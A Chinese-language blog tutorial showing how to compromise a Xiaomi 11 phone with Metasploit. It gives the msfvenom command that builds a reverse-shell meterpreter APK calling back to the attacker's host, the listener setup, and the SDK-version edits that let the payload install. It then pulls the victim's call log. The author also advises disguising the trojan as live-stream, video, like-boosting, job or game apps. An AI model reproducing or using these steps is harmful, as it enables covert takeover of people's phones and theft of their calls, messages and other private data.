msf对小米11进行安全渗透

作者:SwBack
技术交流Q群:768493664

文章在饭前编写,由于着急吃饭,所以排版比较乱

环境配置

工具 型号 接入方式
kali 2021 桥接
安卓手机 小米11 WIFI
Android Killer V1.3.1.0 apktools 2.6.1

实验过程中小米11 未提示风险,(仅签名问题提示非小米应用商店app)
但是功能实际都被拦截,无法获取敏感信息,如通话记录,短信等。
当开启权限之后,信息被成功获取。如文章最下图

实战过程中可以对app进行伪装,修改图标,标题,版本,签名

如(XX直播,XX视频,刷赞,兼职,XX游戏等等)

启动kali后,先查看自己本机IP地址如下

┌──(rootkali)-[~/桌面]
└─# ip a                                           
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 00:0c:29:91:2d:65 brd ff:ff:ff:ff:ff:ff
    inet 192.168.0.105/24 brd 192.168.0.255 scope global dynamic noprefixroute eth0
       valid_lft 6529sec preferred_lft 6529sec
    inet6 fe80::20c:29ff:fe91:2d65/64 scope link noprefixroute 
       valid_lft forever preferred_lft forever

msf对小米11进行安全渗透_第1张图片

生成木马

然后执行如下命令生成木马文件.

这里监听了5555端口

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.105 LPORT=5555 R >Android.apk

开启msf后,加载攻击载荷

use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
#设置监听IP
set LHOST 192.168.0.105
#设置监听端口
set LPORT 5555
#进行监听
run

这里的apk还无法直接在安卓中运行。

提示如下:

msf对小米11进行安全渗透_第2张图片

修改木马

通过对apk反编译。

网上说修改AndroidManifest.xml 文件.

不过该文件需要反编译才能查看。推荐使用xml2axml.jar工具进行,该工具可以直接反编译和编译。

这里我们修改apktool.yml

minSdkVersion修改为16

targetSdkVersion修改为23

msf对小米11进行安全渗透_第3张图片

对其进行编译

msf对小米11进行安全渗透_第4张图片

攻击成功

导入手机安装运行之后kali 回显如下内容证明攻击成功。

msf对小米11进行安全渗透_第5张图片

执行下命令app_list 查看下软件列表,看下用什么app看视频

msf对小米11进行安全渗透_第6张图片msf对小米11进行安全渗透_第7张图片

获取通话记录

meterpreter > dump_calllog
[*] Fetching 624 entries
[*] Call log saved to calllog_dump_20220824201308.txt

msf对小米11进行安全渗透_第8张图片
msf对小米11进行安全渗透_第9张图片

最后

在这里可以通过? 进行查看命令

msf对小米11进行安全渗透_第10张图片

你可能感兴趣的:(渗透测试,安全,android,mfc)